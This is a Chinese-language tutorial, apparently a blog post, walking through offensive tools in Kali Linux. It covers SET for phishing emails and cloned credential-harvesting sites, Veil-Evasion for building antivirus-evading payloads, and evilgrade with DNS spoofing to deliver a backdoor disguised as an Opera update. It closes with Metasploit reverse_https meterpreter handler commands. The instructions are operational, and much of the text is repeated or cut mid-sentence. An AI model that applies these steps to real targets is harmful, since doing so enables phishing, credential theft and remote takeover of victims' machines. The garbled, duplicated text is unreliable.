开始使用社交工程师工具包
启动
Kali 中已预装了社交工程师工具包。要启动 SET,只需转到终端并输入:sudo setoolkit
选项
SET 启动后,您将看到一个选项菜单。本文将重点介绍选项一:社会工程攻击,它提供了多种攻击媒介。以下是此类别中可用选项的概述:
1)社会工程攻击: 该选项侧重于各种社会工程攻击媒介,包括鱼叉式网络钓鱼、网站攻击、感染性媒体生成和凭证窃取。它允许用户模拟和测试各种以人为中心的攻击场景。
2)渗透测试(Fast-Track): Fast-Track 是一套测试工具和脚本,旨在快速部署和利用安全漏洞。它有助于自动化渗透测试的各个方面,并加快发现和利用漏洞的过程
3) 第三方模块:此选项提供与安全社区开发的外部工具和模块的集成。这些模块扩展了 SET 的功能,并可提供工具包内使用的额外攻击媒介、漏洞和有效载荷。
4) 更新 Social-Engineer 工具包:此选项允许将 SET 更新到最新版本,确保您拥有最新的功能、错误修复和改进。定期更新对于维护有效且可靠的工具包至关重要。
5)更新SET配置:此选项可以让您修改SET配置文件。
启动
Kali 中已预装了社交工程师工具包。要启动 SET,只需转到终端并输入:sudo setoolkit
选项
SET 启动后,您将看到一个选项菜单。本文将重点介绍选项一:社会工程攻击,它提供了多种攻击媒介。以下是此类别中可用选项的概述:
1)社会工程攻击: 该选项侧重于各种社会工程攻击媒介,包括鱼叉式网络钓鱼、网站攻击、感染性媒体生成和凭证窃取。它允许用户模拟和测试各种以人为中心的攻击场景。
2)渗透测试(Fast-Track): Fast-Track 是一套测试工具和脚本,旨在快速部署和利用安全漏洞。它有助于自动化渗透测试的各个方面,并加快发现和利用漏洞的过程
3) 第三方模块:此选项提供与安全社区开发的外部工具和模块的集成。这些模块扩展了 SET 的功能,并可提供工具包内使用的额外攻击媒介、漏洞和有效载荷。
4) 更新 Social-Engineer 工具包:此选项允许将 SET 更新到最新版本,确保您拥有最新的功能、错误修复和改进。定期更新对于维护有效且可靠的工具包至关重要。
5)更新SET配置:此选项可以让您修改SET配置文件。
网络钓鱼攻击
网络钓鱼是一种广泛使用的社会工程攻击,旨在诱骗用户泄露敏感信息,例如登录凭据、财务详细信息或个人身份信息。
通过操纵用户,使用户相信他们正在与合法来源进行交互,攻击者可以诱骗他们点击恶意链接、下载受恶意软件感染的文件或泄露机密信息。
可以使用 Gmail、Hotmail、Yahoo或 您域中的电子邮件地址通过 SET 执行网络钓鱼攻击。Gmail 是默认选项,也是我们将使用的选项。要在 Gmail、Hotmail 或 Yahoo 之间切换,您必须编辑 /etc/setoolkit/set.config 文件。
网络钓鱼是一种广泛使用的社会工程攻击,旨在诱骗用户泄露敏感信息,例如登录凭据、财务详细信息或个人身份信息。
通过操纵用户,使用户相信他们正在与合法来源进行交互,攻击者可以诱骗他们点击恶意链接、下载受恶意软件感染的文件或泄露机密信息。
可以使用 Gmail、Hotmail、Yahoo或 您域中的电子邮件地址通过 SET 执行网络钓鱼攻击。Gmail 是默认选项,也是我们将使用的选项。要在 Gmail、Hotmail 或 Yahoo 之间切换,您必须编辑 /etc/setoolkit/set.config 文件。
网络钓鱼活动
从主菜单中,选择选项一“社会工程攻击”,然后选择选项五“群发邮件攻击”,最后选择“电子邮件攻击单个电子邮件地址”。
发送电子邮件至: 这是目标的电子邮件。
接下来,您可以使用 Gmail 帐户或您的服务器帐户。
您的 Gmail 帐户: 您要从中发送电子邮件的帐户。
用户将看到的发件人姓名: 您想要显示的发件人姓名。
将此消息标记为高优先级: 是否希望将其标记为高优先级。
是否要附加文件: 是或否
是否要附加内联文件: 是或否
电子邮件主题: 电子邮件的主题行。
以 HTML 或纯文本形式发送消息: 选择您想要发送电子邮件的方式。
输入邮件正文: 在此处输入实际的电子邮件文本。写完电子邮件后,输入 END 并按回车键。
从主菜单中,选择选项一“社会工程攻击”,然后选择选项五“群发邮件攻击”,最后选择“电子邮件攻击单个电子邮件地址”。
发送电子邮件至: 这是目标的电子邮件。
接下来,您可以使用 Gmail 帐户或您的服务器帐户。
您的 Gmail 帐户: 您要从中发送电子邮件的帐户。
用户将看到的发件人姓名: 您想要显示的发件人姓名。
将此消息标记为高优先级: 是否希望将其标记为高优先级。
是否要附加文件: 是或否
是否要附加内联文件: 是或否
电子邮件主题: 电子邮件的主题行。
以 HTML 或纯文本形式发送消息: 选择您想要发送电子邮件的方式。
输入邮件正文: 在此处输入实际的电子邮件文本。写完电子邮件后,输入 END 并按回车键。
网站克隆和凭证窃取
网站克隆和凭证窃取是社交工程师的两项基本技术。这些技术包括创建合法网站的副本,并诱骗用户在假网站上输入敏感信息,例如用户名和密码。
这些信息随后可用于各种恶意活动,包括未经授权访问用户帐户、身份盗窃甚至企业间谍活动。
克隆站点
在 SET 中设置克隆站点之前,您需要在位于 /etc/setoolkit/set.config 的 SET 配置文件中启用 Apache Web 服务器。将行 APACHE_SERVER=OFF 更改为 APACHE_SERVER=ON,保存文件,然后重新启动 SET 以应用更改。
网站克隆和凭证窃取是社交工程师的两项基本技术。这些技术包括创建合法网站的副本,并诱骗用户在假网站上输入敏感信息,例如用户名和密码。
这些信息随后可用于各种恶意活动,包括未经授权访问用户帐户、身份盗窃甚至企业间谍活动。
克隆站点
在 SET 中设置克隆站点之前,您需要在位于 /etc/setoolkit/set.config 的 SET 配置文件中启用 Apache Web 服务器。将行 APACHE_SERVER=OFF 更改为 APACHE_SERVER=ON,保存文件,然后重新启动 SET 以应用更改。
veil使用
veil 有两个免杀的工具,Evasion 和Ordnance。
Ordnance 可生成在 Veil-Evasion 中使用的 shellcode,Evasion 是用做文件免杀
我们一般选择Evasion,使用list可以查看到41种stager,使用go和ruby语言encode的编码方式。
试一下使用go生成,输入监听的主机和端口就可以,然后再设定生成的payload名字,因为之前已经做过映射,所以在宿主机的/tmp/veil-output/compiled/目录可直接看到生成的exe文件。
veil 有两个免杀的工具,Evasion 和Ordnance。
Ordnance 可生成在 Veil-Evasion 中使用的 shellcode,Evasion 是用做文件免杀
我们一般选择Evasion,使用list可以查看到41种stager,使用go和ruby语言encode的编码方式。
试一下使用go生成,输入监听的主机和端口就可以,然后再设定生成的payload名字,因为之前已经做过映射,所以在宿主机的/tmp/veil-output/compiled/目录可直接看到生成的exe文件。
evilgrade 是一个模块化框架,用于欺骗、注入攻击负载以及创建伪装成现有应用程序更新的后门。当您的目标计算机已完全修补或经常自我更新以作为安全措施时,它非常有用。
干净且易于安装和使用,带有预制二进制文件(代理)
具有可快速进行渗透测试的默认配置,拥有自己的WebServer和DNS服务器模块。
支持 DNS 篡改、DNS 缓存中毒、ARP 欺骗、Wi-Fi 接入点模拟、DHCP 劫持和主机名重定向等攻击
干净且易于安装和使用,带有预制二进制文件(代理)
具有可快速进行渗透测试的默认配置,拥有自己的WebServer和DNS服务器模块。
支持 DNS 篡改、DNS 缓存中毒、ARP 欺骗、Wi-Fi 接入点模拟、DHCP 劫持和主机名重定向等攻击
Evilgrade框架可以通过模拟中间人(MITM)攻击来对操作系统进行安全审计。这种攻击在攻击者拥有DNS访问权限和欺骗能力的情况下有效。Evilgrade使用更新不当的系统实用程序作为攻击媒介。Evilgrade支持的一些标准实用程序包括Notepad++、Ccleaner、Teamviewer、Virtualbox、Filezilla、Skype 和VMware。
当客户端打开其中一个未经过良好升级的实用程序时,Evilgrade会通过MITM攻击向客户端发送(伪造的)更新消息。该消息包含一个有效负载,可间接访问目标系统。如果客户端安装更新,则会在目标系统上下载后门,可以通过Metasploit等程序远程用该后门。
当客户端打开其中一个未经过良好升级的实用程序时,Evilgrade会通过MITM攻击向客户端发送(伪造的)更新消息。该消息包含一个有效负载,可间接访问目标系统。如果客户端安装更新,则会在目标系统上下载后门,可以通过Metasploit等程序远程用该后门。
假设我们的目标运行的是“opera浏览器。我们将尝试动持浏览器的”更新功能,并将网站重定向到攻击者的首选位置,可
以在该位置下载恶意可执行文件。
要选择要配置的程序,请键入“configureopera”,然后键入“showoptions以查所有可能需要配置的选项。要配置选项,1使用“set”命令,然后指定选项并输入与该选项相关的值
例如:(evilgrade (opera)>set agent /var/www/html/Evil-Files/rev-https-8080.exe)
因此,我们在这里设置了名为代理的选项,并提供了可执行文件的确切位置。
现在我们需要进行基本的DNS欺骗攻击,并将”www.opera.com重定向到evilgrade。让我们从配置“mitmf.conf”文件开始。为此,请输入“leafpad/etc/mitmf/mitmf.conf”。为了避免与DNS相关的任何冲突,我们需要将端口号从53更改为5353,因为evilgrade在端口53上运行。然后我们需要在A”记录中添加Opera的虚拟主机地址。
以在该位置下载恶意可执行文件。
要选择要配置的程序,请键入“configureopera”,然后键入“showoptions以查所有可能需要配置的选项。要配置选项,1使用“set”命令,然后指定选项并输入与该选项相关的值
例如:(evilgrade (opera)>set agent /var/www/html/Evil-Files/rev-https-8080.exe)
因此,我们在这里设置了名为代理的选项,并提供了可执行文件的确切位置。
现在我们需要进行基本的DNS欺骗攻击,并将”www.opera.com重定向到evilgrade。让我们从配置“mitmf.conf”文件开始。为此,请输入“leafpad/etc/mitmf/mitmf.conf”。为了避免与DNS相关的任何冲突,我们需要将端口号从53更改为5353,因为evilgrade在端口53上运行。然后我们需要在A”记录中添加Opera的虚拟主机地址。
程序启动后,输入(useexploit/multi/handler)来使用漏洞exploit/multi/handler”。需要根据使用Veil-Evasion创建的后门来设置有效载荷。创建了与针对Windows设备的”meterpreter/reverse_https相关的后门,因此有效载荷应设置为“reverse_https。要设置有效载荷类型(setPAYLOADwindows/meterpreter/reverse_https)。要显示需要设置的所有可用选项,请输入“showoptions”
现在将“LHOST选项设置为Kali机器的IP地址(设置LHOST10.0.2.15),将LPORT设置为后门将运行的端口(设置LPORT8080),然后通过输入“exploit开始攻击。
现在将“LHOST选项设置为Kali机器的IP地址(设置LHOST10.0.2.15),将LPORT设置为后门将运行的端口(设置LPORT8080),然后通过输入“exploit开始攻击。